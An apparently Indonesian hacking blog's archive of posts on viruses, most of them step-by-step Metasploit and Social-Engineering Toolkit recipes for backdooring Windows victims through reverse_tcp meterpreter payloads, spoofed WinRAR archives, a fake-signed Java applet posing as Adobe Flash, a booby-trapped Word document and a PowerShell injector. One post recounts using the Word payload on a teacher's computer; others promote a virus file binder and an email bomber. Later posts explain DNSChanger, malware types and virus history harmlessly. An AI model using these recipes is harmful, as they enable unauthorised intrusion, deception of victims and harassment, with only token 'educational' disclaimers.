Tampilkan postingan dengan label Virus. Tampilkan semua postingan
Tampilkan postingan dengan label Virus. Tampilkan semua postingan

Rabu, 06 Januari 2016

Rakabulle File Binder


Catatan Kali ini saya bahas Rakabulle
Rakabulle adalah tool FileBinder

Tool ini memungkinkan kalian untuk bind multi files / program bersamaan, dan mengesekusi file bersamaan

jadi beberapa files di jadikan dalam 1 program. think about WinRAR,tapi winrar tidak dengen mengeksekusi.

lengkap nya bisa lihat


english :
What is a file binder? In few words a file binder is a tiny tool which allows merging any kind of files in a single application.
When you execute the application, all previous merged files will be extracted to a temporary location then be executed normally.
Winrar for example propose a kind of function called SFX for Self Extraction Package, the only difference is that the binder doesn’t show any dialog. It will extract and execute the files in transparency.


gambar diatas, file / program yang di input atau drop
input bisa berupa files atau program apa aja

coba bayangkan jika banyak virus yang di jadikan kedalam satu program, dan ketika program tersebut di jalankan..
secara bersamaan ratusan virus itu juga ikut dijalankan :)

**kemarin sih percobaan input nya payload metasploit. and Work !!


beberapa fungsi Rakabulle
- File binder, auto file extractor and executor.
- REM (Remote Code Execution), Execute code (Plugins) in target process (Explorer or Internet Explorer)
- Support 32 and 64 Process.
- The application is a 32bit Application (Soon we will compile the 64bit version)
- Support UPX compression for the stub (Without compression stub size is about 38KiB using pure Windows API no extra libraries; with compression stub size is approximately 16KiB) The UPX compression doesn’t change the way the application work only the final size.
- Support Windows startup.
- Doesn’t require administrative privileges.
- Plugins and File list support drag n drop.
- Support plugins with an open source example.
- The stub and the builder are coded using Unicode encoding.
Share:

Rabu, 04 Juni 2014

WinRAR Filename Spoofing with Metasploit


Belom lama ini dunia lagi ramai dengan "Winrar File Spoofing"
sampai-sampai metasploit membual module exploit nya..

http://www.exploit-db.com/exploits/32752/

Saya pun tertarik untuk mencoba nya ^ ^
Menurut gw ini cukup bagus ya,buat memanipulasi trap ( jebakan ) ke victim
bisa lolos dari Anti Virus ( entahlah, gak banyak saya test ke AV lain )

Requiment :
Metasploit v4.9.2  atau lebih
more info about metasploit v4.9.2 at https://community.rapid7.com/docs/DOC-2736


ok..mari kita coba
Open your metasploit console


msf > use exploit/windows/fileformat/winrar_name_spoofing
msf > set filename [ Name_File ]
msf > set spoof [ File_Trap ]

msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost [ your IP ]
msf > set lport

Kita buat file nya dengan perintah "exploit"
file berada di directory /root/.msf4/local/



ok,next kita hanya tinggal kasih ke victim :)

Jalankan exploit multi handler

msf > use exploit/multi/handler

untuk melisten/ menerima koneksi dari target via exploit yg tadi dibuat



and..ketik si victim membuka file tersebut,
**damm ,you got meterpreter session

Share:

Rabu, 19 Juni 2013

Exploit with Java_Signed Applet

hola,ketemu lagi sama saya nih

kali ini ane mau share cara exploit dengan java signet
dengan catatan sang korban harus menginstall java..

sedikit info kegunaan Java :
salah satu nya untuk Membantu pembuatan program untuk dijalankan dalam browser Web dan layanan Web.
seperti virus scanner online,website can you run it,dan masih banyak lagi...


oke,kembali ke topik
cara exploit nya hampir sama dengan yg kemarin ane share ya itu shourcut shell
dengan mengirim file" exploit ke ip korban


tapi java signet ini lebih mantap lagi
saat korban mengklik url path jebakan kita
(ipheker.com/urlpart)
sedikit dengan soceng,agar menyakinkan korban agar mengallow koneksi java
 dan trick ini aman dari virus :D


bagaimana cara nya ? cekidot..

buka console metasploit kalian

> use exploit/multi/browser/java_signed_applet
> set payload windows/meterpreter/reverse_tcp
> show options
> set appletname clound_music  (kasih nama yang bisa meyakinkan korban)
> set certcn Adobe Flash Player
> set srvhost [IP ente]
> set srvport 80 [karna memakai web browser]
> set uripath music [ip.com/path]
> set lhost [ip ente]
> set lport 443
> exploit



nah klo exploit sudah di jalankan
sekarang kita bujuk korban untuk masuk ke perangkap kita

dan begitu korban mengexekusi jebakan kita
 langsung muncul jendela security Java,


berdoa aja agar korban mengkilk allow
dan kita masuk kita ke kompi korban deh :D



sekian dari saya
Clound


Share:

Jumat, 14 Juni 2013

Payload With Ms.Word Document

halo semua...
thank's ya udah sering update di blog ane :D

ane mau curhat,sekalian share ilmu nih
waktu itu saya ada tugas sekolah,mengunakan Ms.Office Word
semua teman saya sudah memberikan tugas mereka masing-masing lewat flash disk nya

dan saya lagi itu kebetulan tugas nya lupa di copy ke flash disk -_-
idea gila ini datang ketika saya mengetikan "route" pada laptop saya
dan saya melakukan scaning dengan Nmap.ternyata saya dan guru saya berada dalam satu jaringan yang sama

idea saya adalah membuat overlow aplikasi ms.office guru saya,agar dia tak bisa melihat tugas saya.
karna file .doc saya ini bukan ducument sebenar nya,melainkan payload :v

dan saya setting autorun pada flash disk,
sebelum mendatangi meja guru tersebut saya sudah menjalankan Reverse_tcp,dan mengengarkan ip yg masuk ke meterpreter
hanya tinggal menungu korban menjalankan file saya..

dengan bangga saya mengahpiri meja guru itu
dan menyolokan Flash saya sendiri
alhasil aplikasi guru saya itu langsung "Not Responding"
saya beralasan,kalau file tersebut terkena virus
dan minta izin untuk ngumpulin lagi besok

begitu saya kembali ke meja saya,meterpreter terbuka
rencana sih mau di jailin tuh guru

sekian cerita dari saya Clound


tapi bagaimana cara membuat Payload berextension .doc
hampir lupa saya :3

ketik di msfconsole kalian :
> use exploit/windows/fileformat/ms12_027_mscomctl_bof
> set payload windows/meterpreter/reverse_tcp
> set lhost
> exploit

tahap ini kita hanya baru membuat file payload nya aja
file payload nya berada di folder : /root/.msf4/local/

jika sudah siap semua,langsung jalankan exploit multi_handler

> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost
> exploit



nah,tinggal tungguin aja korban menjalankan payload tersebut


tambahan sedikit,begitu ms.office "not responding"
biasa nya dia langsung exit dengan sendiri nya,arti nya payload kita juga akan exit

segera lakukan migrate ke aplikasi lain,dengan membaca proses yg di lakukan si target :D


karna kalau udah migrate,meterpreter kita tak bisa di hentikan,apa lagi klo migrate nya ke prosses system
ok,thank's
Share:

Selasa, 11 Juni 2013

Exploit Windows without Backdoor


halo semua ketemu lagi sama saya si Clound yang tampan tiada tara \o/
seperti kmaren saya akan share cara exploit
gak tau kenapa,lagi hobby main metasploit..dan ketagihan stage meterpreter :v

kalau kemaren saya share cara exploit windows dengan backdoor yang tidak terdeksi virus oleh AV
dengan SET ( Social Enginering Toolkit ) Disini

kali ini saya akan share cara exploit windows tampa Backdoor
tapi mengunkan shourcut link yang di exec oleh Browser korban,
Bagaimana cara nya ?    langsung aja cekidot


buka metasploit kalian..

ketik di msfconsole kalian seperti berikut :

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

set SRVHOST [Ip ente]
set LHOST  [ip ente]
set PAYLOAD windows/meterpreter/reverse_tcp


nah tinggal exploit dah,


disini,sang korban harus mengakes alamat IP anda dengan port 80..
yaitu mengunakan webBrowser



**lihat gambar di atas,
lihat terminal di sebelah kiri
 saat korban mengakses IP anda,saat itu juga dia mendownload shuorcut backdoor yang akan membuka stage meterpreter

tunggin aja sampe keluar tulisan
[*] Meterpreter session 1 opened

dan beginilah hasil nya om..


oke.. sekian dari saya clound :D
semua nya hanya untuk materi pembelajaran saja
not for crime,Peace



Share:

Backdoor Exploit without Virus with SET

halo semua ketemu lagi sama saya si Clound :D
kali ini saya mau share cara membuat bakdor exploit bebas virus dengan SET (Social Enginering Toolkit)

gak percaya no virus detect ??
nih SS,ane Scan pakai ABG 2011 (biar 2011 ane update tiap hari loh bro )


oke langsung aja..
buka tool nya,yang berada di derektori /pentest/exploits/set/
./set



kalo dah jalan tuh tool
pilih options 1,
yaitu : Social-Enginering Attack


next,pilih options 10
yaitu,Powershell Attack Vectors



next lagi, pilih options 1
Powershell Alphanumeric Shellcode Injector


nanti dia akan nagih IP kita,sebagai si pendengar
isikan dan IP ente sesuai network interface yg ente pakai

untuk Port nya ane pakai 445
karna 443,sudah terlalu mainstream

Do you want to start listener now ?
terserah ente dah mau exploit nya sekarang atau nanti-nanti aja

masukan architecture target. [x86/x64]

tunggu sampai prosses pembuatan Powershell nya selasi,

kalo tadi ente ketik Yes,secara otomatis jendela Metesploit akan terbuka..
menunggu sang korban mengklik bakdor nya,



btw,disini letak hasil Powershell nya om :D
/pentest/exploits/set/reports/


**lihat gambar di atas..
terdapat 2 file x64 dan x86
ambil satu saja sesuai architexture korban..
dan ganti extension nya dari .txt >> menjadi .bat


nah ini dia yg bkin binggung
pkoe bakdor ini (x86_powershell_injection.bat) ini mesti masuk ke PC korban
pikirin ajalah sendiri cara nya :v


pkoe diskenariokan bakdor udah masuk di PC korban.. :D
dan msf langsung dapet stage meterpreter \o/


kalo udah ada satu korban yg klik tuh bakdor
list siapa aja korban yg udah menjalankan bakdor nya : sessions -i
ketik : sessions -i [nmor antrian]


dan... kita masuk ke system nya dah om..
klo kita udah masuk session meterpreter di PC korban,itu pc udah ada di tangan kita om

terserah ente dah mau di apaan


oke dah.. sekian dari saya
Clound
Share:

Minggu, 23 Desember 2012

Cara Membuat Backdoor Dengan msfpayload


Pertama kita kenalan dulu sama yang nama nya Backdoor

Backdoor adalah salah satu jenis trojan yang sering digunakan untuk mengontrol suatu komputer dari jarak jauh melalui jaringan baik lokal maupun Internet. Ciri khas backdoor adalah berjalan secara tersembunyi, tidak menampilkan hal-hal yang mencurigakan, serta membuka port agar komputer dapat diakses secara remote. Backdoor dapat juga disebut sebagai Remote Access Trojan atau Remote Administration Tool (RAT).

Ok,langsung aja kita buat Backdoor nya.

pertama pastikan anda berada dalam satu jaringan dengan target.
ping target anda,apakah terkoneksi dengan anda atau tidak ?
dan anda sudah menginstall Metasploit

ketik di Terminal
msfconsole

ketik lagi di msf nya :

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.154.1 x > /root/Desktop/bakdor.exe


keterangan :
LHOST = IP attacker,atau IP anda
bakdor.exe = nama Backdoor nya

nah,ini dia yg paling susah. -_-
anda harus taruh backdoor itu di PC korban,

ok,misalkan backdoor nya sudah masuk ke korban
buka metasploit nya,ketik di terminal :
msfconsole

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.154.1 (Gunakan IP anda )
exploit  (langsung eksekusi... ! )

nah,pastikan korban meng'klik / menjalankan Backdoor yang tadi di buat


Setelah itu,terserah anda mau di buat apa target nya,


#This for educational purpose only.
#Use it at your own risk !!!


ok sekian dari saya Clound
Thank's for Support us.


Share:

Sabtu, 22 Desember 2012

Bomb Email


Hai semua,ketemu lagi sama ane Clound yg ganteng :D
kali ane mau Share BOM Email ,
Spammer dah wkwkwkwkw.....



ok,langsung aja download disini tool nya

paste ke gedit,Save dengan extension .py (bombmail.py)

ok,kita kasih permission dulu file nya, agar bisa di eksekusi/di jalankan
chmod +x bombmail.py

ok,sekarang kita jalankan tool nya.

python bombmail.py


Keterangan :

Server Mail : (Server yg akan anda gunakan untuk menyerang )
Username :  Nama email kalian
Password : password email anda,yg akan anda pakai untuk mengebom.
*saya jamin Account anda aman,bisa di cek Source nya

To : target yg akan kita serang ( target@yamil.com/target@gomai.com )
Message : pesan yg akan anda kirim
Number of Send : berapa banyak jumlah yang akan di kirim

dan ini bukti bawha email berhasil masuk


Note : This for education purpose only.
Awas aja kalo ada yang bom email saya -_-


Sekian dari saya Clound.

Share:

Kamis, 26 April 2012

Cara Mengetahui Komputer yang Terinfeksi Virus DNS Changer


Setelah Kemaren saya Posting Pengertian DNS Changer.
sekarang saya akan posting Cara Mengetahui Komputer yang Terinfeksi Virus DNS Changer



Jutaan komputer di seluruh dunia telah terinfeksi DNS Changer, sebuah virus yang membuat pemilik komputer kesulitan mengakses internet setelah 9 Juli 2012.

Di Australia, peringatan telah diberikan kepada masyarakat, seperti dikutip Sydney Morning Herald. Biro investigasi Amerika Serikat, FBI, sampai turun tangan mengatasi program jahat yang dianggap berbahaya ini.

Ini adalah Cara mengetahui komputer snipers jika terinfeksi  Virus DNS Changer, FBI menyediakan alatnya secara online. Berikut caranya:

1. Buka situs http://www.dcwg.org.

DCWG merupakan kepanjangan dari DNS Changer Working Group, sebuah situs yang dibangun ahli keamanan untuk memantau virus DNS Changer.

2. Klik tombol hijau "Detect" di pojok kiri atas.

3. Anda akan diarahkan ke halaman baru seperti gambar di bawah ini. Klik tautan http://www.dns-ok.us/ pada posisi yang telah Kompas Tekno lingkari dengan warna merah.

4. Jika komputer Anda tidak terinfeksi, di monitor akan muncul logo besar berwarna hijau dengan pesan, "DNS Resolution = GREEN". Maka, Anda tidak perlu melakukan apa pun.

5. Namun, jika yang muncul di monitor Anda adalah logo merah, tampaknya komputer Anda terinfeksi DNS Changer.

Silakan mengambil langkah segera untuk mengikuti petunjuk dan meng-install salah satu software antivirus gratis disini untuk membasmi program jahat DNS Changer.
Apa itu Viruss DNS Changer?

Pada 8 November 2011, FBI dan kepolisian Estonia berhasil menangkap beberapa penjahat cyberdari sebuah perusahaan asal Estonia, Rove Digital.

Rove Digital menyebar virus DNS Changer dengan berbagai cara, mulai dari mengunjungi situs tertentu ataupun mengklik iklan online, yang semua itu telah disisipi DNS Changer.
Apa yang akan dilakukan Virus DNS Changer?

DNS Changer yang menyerang sistem operasi Windows dan Mac mengubah konfigurasi Domain Name Server (DNS) pada komputer korban, dan diam-diam mengerahkannya ke server DNS palsu milik Rove Digital.

Rove Digital bisa saja mencuri data korban, mungkin kartu kredit atau dokumen penting lainnya, untuk mendapat keuntungan materi.

Saat ini masih ada jutaan komputer yang terinfeksi DNS Changer dan masih terhubung ke DNS palsu tersebut.FBI sudah menyita server DNS palsu Rove Digital dan masih mengamankannya.

Karena ini adalah server DNS palsu yang sarat akan tindakan penyalahgunaan, penegak hukum Amerika Serikat memerintahkan FBI untuk mematikan server DNS palsu Rove Digital itu pada 9 Juli 2012. Dan, akibatnya, korban-korban DNS Changer akan kesulitan mengakses internet.

Tanpa DNS, pengguna internet tidak bisa mengakses sebuah situs dengan mengetik alamat situs web-nya, misalnya google.com, facebook.com, dan wordpress.com.

Untuk mengakses tanpa DNS, pengguna harus memasukkan alamat Internet Protocol (IP) situs-situs tersebut.
Masalahnya, tidak semua pengguna internet hafal nomor IP address situs-situs tersebut. Hal ini akan membuat seseorang kesulitan mengakses internet, atau berpikir bahwa jaringan internetnya terputus.

Semoga Tips Cara mengetahui komputer Anda jika terinfeksi  Virus DNS Changer ini berguna bagi Anda
Share:

Virus DNS Changer


Waspadai "Internet Mati" Setelah 9 Juli


Bukan menakut-nakuti, ada kemungkinan akses internet akan terganggu setelah 9 Juli 2012. Di Australia, peringatan diberikan pada 10.000 pengguna.

Peringatan itu disampaikan oleh otoritas setempat, Australian Communications and Media Authority (ACMA) seperti dikutip oleh Sydney Morning Herald.

Meski peringatan ACMA adalah untuk Australia, diduga penyebab gangguan tersebut juga bisa dialami oleh pengguna internet lain di dunia.

Penyebab gangguan itu adalah program jahat berjulukan DNSChanger yang saat ini diperkirakan menelan korban hingga 4 juta komputer di seluruh dunia.

Mengapa bisa menyebabkan gangguan akses internet? DNSChanger mengubah pengaturan Domain Name Server (DNS) pada komputer pengguna. Semua akses korban akan dialihkan ke server web tertentu secara diam-diam.

Saat ini biro penyelidikan Amerika Serikat (FBI) sudah menyita server yang dimaksud dan menyediakan solusi sementara. Sehingga, bisa dikatakan, korban DNSChanger tak akan terjebak ke situs berbahaya.

Nah, rencananya, paling cepat pada 9 Juli 2012 FBI akan mematikan solusi sementara tersebut. Ini artinya, korban DNSChanger akan kehilangan akses ke server tersebut.

ACMA bekerjasama dengan pemerintah Australia, membuat website beralamat dns-ok.gov.au yang bisa digunakan pengguna untuk melihat apakah komputernya menjadi korban DNSChanger.

Meski Anda tidak di Australia, situs dns-ok.gov.au tetap bisa digunakan untuk memeriksa apakah komputer yang digunakan menjadi korban DNSChanger atau tidak.

Bruce Matthews, manajer divisi keamanan di ACMA mengatakan bahwa sejak November 2011, sebanyak 10 ribu pengguna internet Australia telah terinfeksi DNSChanger.

Paul Ducklin, dari Sophos Australia mengatakan, ada kemungkinan pengguna yang sudah tidak terinfeksi DNSChanger masih akan mengalami masalah karena pengaturan DNS-nya telah diubah oleh program jahat itu.

"Meskipun program antivirus Anda telah menjamin komputer Anda sehat, tetap ada kemungkinan efek samping program jahat itu masih tersisa," kata Ducklin.
Share:

Jumat, 06 April 2012

Bentuk Serangan Virus Komputer

 Virus menyerang ke dalam komputer dengan berbagai cara. Tapi pada umumnya virus bertujuan untuk merusak system yang bekerja di dalam komputer kita.

Bentuk-bentuk serangan yang dilakukan virus pada file:

1. Menghapus, memindahkan, menyembunyikan dan mengerusak file(harap jangan sampai merusak isi file karena sapa tahu file itu sangat penting mungkin file tersebut tulisan skripsi ato apalah yang tentunya begitu berarti bagi user(patuhi saran vm yang baik)

2. Infeksi terhadap file, biasanya virus melakukan ini untuk melindungi dirinya dengan cara menempel dirinya pada file yang ingin di infeksi. Biasanya file*.exe, *.com, dll.

3. Memformat partisi dan menghapus partisi (harap bagi vm jangan lakukan ini karena selain memusnahkan virus sendiri juga memusnahkankan data orang).

4. Menyembunyikan folder asli lalu membuat folder palsu dengan nama yang sama tetapi folder tersebut sebenarnya adalah file virus berekstensi .exe hal ini juga dapat dilakukan pada file dengan ekstensi2 tertentu yang diinginkan sang vm untuk dibuat file palsunya.


Bentuk-bentuk serangan diatas adalah bentuk serangan yang paling sering dilakukan oleh virus untuk melakukan manipulasi terhadap suatu file . Menghapus, memindahkan dan menyembunyikan file merupakan hal yang sangat sering digunakan oleh virus. Bahkan hampir semua virus menggunakan tehnik ini untuk melakukan manipulasi terhadap suatu file. Infeksi terhadap file exe, com, dan scr sangat jarang ditemukan karena teKnik ini cukup sulit dilakukan.
Share:

Sabtu, 17 Maret 2012

Perbedaaan dan Penjelasan antara Virus ,Worm,Trojan, Backdoor, Malware, Spyware

  1.) Virus :
  Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.

    Virus komputer umumnya dapat merusak perangkat lunak komputer dan tidak dapat secara langsung merusak perangkat keras komputer (terutama pada sistem operasi , seperti sistem operasi berbasis keluarga Windows (Windows 95, Windows 98/98SE, Windows NT, Windows NT Server, Windows 2000, Windows 2000 Server, Windows 2003, Windows 2003 Server, Windows XP Home Edition, Windows XP Professional, Windows XP Servicepack 1, Windows XP Servicepack 2 yang terbaru pun Windows Vista dan Win7 bahkan baru2 ini sudah merambah ke GNU/Linux. Efek negatif virus komputer terutama adalah perbanyakan dirinya sendiri, yang membuat sumber daya pada komputer (seperti CPU Time, penggunaan memori) menjadi berkurang secara signifikan. Hampir 95% Virus adalah virus komputer berbasis sistem operasi Windows. Sisanya, 2% menyerang Linux/GNU (dan Unix, sebagai source dari Linux, tentunya), 1% menyerang Mac terutama Mac OS 9, Mac OS X (Tiger, Leopard). 2% lagi menyerang sistem operasi lain seperti FreeBSD, OS/2 IBM, dan Sun Operating System.

   Serangan virus dapat dicegah atau ditanggulangi dengan menggunakan perangkat lunak antivirus. Jenis perangkat lunak ini dapat juga mendeteksi dan menghapus virus komputer, asalkan basis data virus komputer yang dimiliki oleh perangkat lunak antivirus telah mengandung kode untuk menghapus virus tersebut atau dengan kata lain telah up to date.

   Beberapa Contoh antivirus  :  KasperSky, AVG, NOD32, AntiVir, PCMAV, Norton, Norman, dan McAfee dan masig banyak lagi bahkan Antivirus lokal pun sekarang mulai marak dibicarakan Seperti Smadav, Ansav dll, dan yang terbaru Artav.

  2.) Worm :
Worm adalah jenis virus yang tidak menginfeksi program lainnya.
Ia membuat copy dirinya sendiri (Cloning) dan menginfeksi komputer lainnya (biasanya menggunakan hubungan jaringan) tetapi tidak mengkaitkan dirinya dengan program lainnya; akan tetapi sebuah worm dapat mengubah atau merusak file dan program.

 3.) Trojan :
 Trojan adalah replika atau duplikat virus. Trojan dimasukan sebagai virus karena sifat program yang tidak diinginkan dan bekerja dengan sendirinya pada sebuah computer. Sifat trojan adalah mengkontrol computer secara otomatis. Misalnya computer yang dimasuki trojan email. Trojan dimasukan dalam RATS (remote administration tools) dimana sebuah computer dikontrol oleh program tertentu, bahkan beberapa trojan difungsikan membuka computer agar dapat dimasuki oleh computer dan diaccess dari jauh, bahkan beberapa RAT's terbaru sudah mempnyai fungsi yang lebih lengkap diantaranya dilengkapi fungsi keylogger dll, bahkan bisa memerintahkan komputer yg terinfeksi sebagai pasukan untuk menyerang (Baca:Bot)

 4.)Backdoor :
Backdoor atau "pintu belakang", dalam keamanan sistem komputer, merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya). Disebut juga sebagai back door.

   Backdoor pada awalnya dibuat oleh para programer komputer sebagai mekanisme yang mengizinkan mereka untuk memperoleh akses khusus ke dalam program mereka, seringnya digunakan untuk membenarkan dan memperbaiki kode di dalam program yang mereka buat ketika sebuah crash akibat bug terjadi. Salah satu contoh dari pernyataan ini adalah ketika Kenneth Thompson (salah seorang pemrogram sistem operasi UNIX membuat sebuah program proses login pada tahun 1983 ketika memperoleh Turing Award), selain program login umum digunakan dalam sistem operasi UNIX dengan menggunakan bahasa pemrograman C, sehingga ia dapat mengakses sistem UNIX yang berjalan di dalam jaringan internal Bell Labs. Backdoor yang ia ciptakan itu melindungi dirinya dari pendeteksian dan pembuangan dari sistem, meskipun pengguna berhasil menemukannya, karena memang backdoor ini membuat dirinya sendiri kembali (melakukan rekompilasi sendiri).

  Beberapa pengembang perangkat lunak menambahkan backdoor ke dalam program buatannya untuk tujuan merusak (atau tujuan yang mencurigakan). Sebagai contoh, sebuah backdoor dapat dimasukkan ke dalam kode di dalam sebuah situs belanja online (e-commerce) untuk mengizinkan pengembang tersebut memperoleh informasi mengenai transaksi yang terjadi antara pembeli dan penjual, termasuk di antaranya adalah kartu kredit, dalam hal ini biasanya disisipkan kedalah shell code sehingga pemilik shell bisa leluasa mendapatka info apapun tentang host :)

   Istilah backdoor sekarang digunakan oleh hacker-hacker untuk merujuk kepada mekanisme yang mengizinkan seorang peretas sistem dapat mengakses kembali sebuah sistem yang telah diserang sebelumnya tanpa harus mengulangi proses eksploitasi terhadap sistem atau jaringan tersebut, seperti yang ia lakukan pertama kali. Umumnya, setelah sebuah jaringan telah diserang dengan menggunakan exploit (terhadap sebuah kerawanan/vulnerability), seorang penyerang akan menutupi semua jejaknya di dalam sistem yang bersangkutan dengan memodifikasi berkas catatan sistem (log) atau menghapusnya, dan kemudian menginstalasikan sebuah backdoor (Shell code) yang berupa sebuah perangkat lunak khusus atau menambahkan sebuah akun pengguna yang memiliki hak akses sebagai administrator jaringan atau administrator sistem tersebut. Jika kemudian pemilik jaringan atau sistem tersebut menyadari bahwa sistemnya telah diserang, dan kemudian menutup semua kerawanan yang diketahui dalam sistemnya (tapi tidak mendeteksi adanya backdoor yang terinstalasi), penyerang yang sebelumnya masih akan dapat mengakses sistem yang bersangkutan, tanpa ketahuan oleh pemilik jaringan, apalagi setelah dirinya mendaftarkan diri sebagai pengguna yang sah di dalam sistem atau jaringan tersebut. Dengan memiliki hak sebagai administrator jaringan, ia pun dapat melakukan hal yang dapat merusak sistem atau menghilangkan data. Dalam kasus seperti di atas, cara yang umum digunakan adalah dengan melakukan instalasi ulang terhadap sistem atau jaringan, atau dengan melakukan restorasi dari cadangan/backup yang masih bersih dari backdoor.

   Ada beberapa perangkat yang dapat digunakan untuk menginstalasikan backdoor, seperti halnya beberapa Trojan horse, tetapi yang populer adalah Netcat (jaman jadul), yang dapat digunakan di dalam sistem operasi Windows ataupun UNIX. Sekarang fungsi sudah tergantikan oleh beberapa Rat's terbaru seperti cybergate, poison ivy prorat dll..(backdoor dan trojan saling melengkapi)

4.)Malware :
Malware adalah program komputer yang diciptakan dengan maksud dan tujuan utama mencari kelemahan software. Umumnya Malware diciptakan untuk membobol atau merusak suatu software atau operating sistem.
Contoh dari malware adalah Virus, Worm, Wabbit, Keylogger, Browser Hijacker, Trojan Horse, Spyware, Backdoor, Dialer, Exploit dan rootkit .

 5.)Spyware :
Spyware adalah perangkat lunak yang mengumpulkan dan mengirim informasi tentang pengguna komputer tanpa diketahui oleh si pengguna itu.
Informasinya bisa yang tidak terlampau berbahaya seperti pola berkomputer, terutama berinternet, seseorang sampai yang berbahaya seperti nomor kartu kredit, PIN untuk perbankan elektronik (e-banking) dan password suatu account.
Informasi tentang pola berinternet, telah disebutkan, tidak terlampau berbahaya. Situs yang dikunjungi, informasi yang kerap dicari, obrolan di ruang chat akan dimata-matai oleh si spyware.
Selanjutnya, informasi itu digunakan untuk menampilkan iklan yang biasanya berupa jendela pop-up. Iklan itu berhubungan dengan kebiasaan seseorang berinternet. Misalnya kerap kali seseorang mencari informasi mengenai kamera digital. Jendela pop-up yang muncul akan menampilkan, misalnya situs yang berdagang kamera digital. Adware adalah istilah untuk spyware yang begini.
Penyebaran spyware mirip dengan Trojan. Contohnya, flashget. Ketika flashget yang dipakai belum diregister, flashget bertindak sebagai spyware. Coba saja hubungkan diri ke internet, jalankan flashget yang belum diregister, cuekin computer beberapa saat, pasti muncul jendela internet explorer yang menampilkan iklan suatu situs.


Untuk mengantisipasi Virus-virus komputer yang semakin mengganas, pastikan komputer anda selalu terproteksi dengan antivirus yang up to date..dan jangan lupa pakai AV yang sudah dilengkapi dengan Internet Security klo perlu tambahkan Firewall untuk keamanan yang berlapis guna melindungi PC anda dari serangan langsung maupun tidak langsung.

Semoga Bermanfaat ^_^
Share:

Sejarah Virus

    Virus yang pertama kali muncul di dunia ini bernama [Elk Cloner] lahir kira-kira tahun 1981 di TEXAS A&M. Menyebar melalui disket Apple II yang ada operating systemnya. Sang perusak ini mendisplay pesan di layar :    "It will get on all your disks-It will infiltrate your chips?yes it is Cloner!-It will stick to you like glue-It will modify RAM too-send in the Cloner!" Hi??????.



   Nama "Virus" itu sendiiri baru diberitakan setelah 2 tahun kelahirannya oleh Len Adleman pada 3 November 1983 dalam sebuah seminar yang ngebahas cara membuat virus and memproteksi diri dari virus. Tapi orang-orangorang sering menganggap bahwa virus yang pertama kali muncul adalah virus [Brain] yang justru lahir tahun 1986. Wajar aja, soalnya virus ini yang paling menggemparkan dan paling meluas penyebarannya karean menjalar melalui disket DOS yang waktu itu lagi ngetrend. Lahirnya juga bersamaan dengan [PC-Write Trojan] dan [Vindent]

    Mulai saat itu, `virus mulai menguasai dunia. Perkembangannya mengerikan dan sangar banget ! berselang satu tahun muncul virus pertama yang menginfeksi file. Biasanya yang diserang adalah file yang berekstensi *.exe Virus ini bernama [suriv] termasuk dalam golongan virus "jerussalem". Kecepatan penyebarannya cukup 'menggetarkan hati' untuk saat itu. Tapi virus ini ngga' terlalu jahat ko' soalnya virus ini menghantam dan menghajar mainframe-nya IBM ngga' lama-lama, cuma setahun (eh setahun itu lama apa sebentar ya??)

   Tahun 1988, muncul serangan BESAR terhadap Machintosh oleh virus [MacMag] dan [scores] dan jaringan Internet dihajar habis-habisan oleh virus buatan Robert Morris. Tahun 1989 ada orang iseng yang ngirim file "AIDS information program" dan celakanya, begitu file ini dibuka, yang didapat bukannya info tentang AIDS, tapi virus yang mengenskrypsi harddisk dan meminta bayaran untuk kode pembukanya (hehehe??.. ada-ada aja cara orang nyari duit)

   Para Cracker memang tidak pernah puas. Setiap muncul sistem operasi atau program baru, mereka sudah siap dengan virus barunya. Kamu yang sering ngetik dengan MS Word mungkin pernah nemuin virus Titassic. Ini virus local asli Indonesia lho? and uniknya, virus ini ngingetin kita buat sholat tepat pada waktunya (waduh, alim juga ya..) Tapi jangan salah, virus macro yang punya judul [concept]ini juga bisa berhati jahat, sangar and ganas banget. Soalnya si alim yang jahat ini bakalan ngemusnahin 80% file-file data and program korbannya.

  Nah, seiring dengan perkembangan teknologi, muncul virus pertama yang mengkombinasi virus macro dan worm. Namanya cukup manis [Melissa]. Tapi ngga' semanis namanya, virus ini bakalan menyebar ke orang lain lewat E-Mail and yang paling menyakitkan, ia bakalan nyebar ke semua alamat E-Mail yang ada di address book-mu. Dan saat ini muncul jutaan virus yang bergentayangan ngga' karuan di alam Internet.
Share:

Cara Mengetahui Sebuah File Terinfeksi Virus Atau Tidak

 Seringkali kamu mendapat email dengan lampiran (attachment) di dalamnya dan kamu tidak yakin apakah file tersebut aman dari virus. Seringkali juga kamu dimintai persetujuan oleh sebuah website untuk menginstal software yang tidak kamu kenal. Atau pernahkah kamu disodori flash drive oleh temanmu dan diminta untuk membuka file di dalamnya?

   Nah, apabila kamu merasa ragu-ragu akan ‘kebersihan’ file tersebut alias apakah ia terjangkit virus atau tidak, sisihkan sedikit waktu guna menyelidikinya. Panduan di bawah ini akan membantu kamu untuk melindungi komputer dari virus atau program jahat yang tak diinginkan. Lakukan dengan cermat.


   Percayakan pada Keampuhan Software :
Software keamanan (program antivirus atau anti malware) telah memiliki kemampuan untuk mengecek file sebelum kamu membukanya (atau bahkan sebelum kamu mentransfernya dari media lain ke komputermu). Begini caranya:

1. Lihat ikon file tersebut di sebuah window.
2. Klik kanan pada ikon untuk memunculkan menu kontekstual.
3. Klik ‘Scan file’ pada menu yang muncul guna memulai proses scanning.
Jika software keamananmu tidak memiliki opsi menu kontekstual, buka control panel software tersebut dan navigasikan pada seksi scan. Di sini, kamu akan bisa memilih target tertentu (file) untuk di-scan (kadang-kadang opsi ini ada di menu Advanced Options).


Penyelidikan" di Internet :
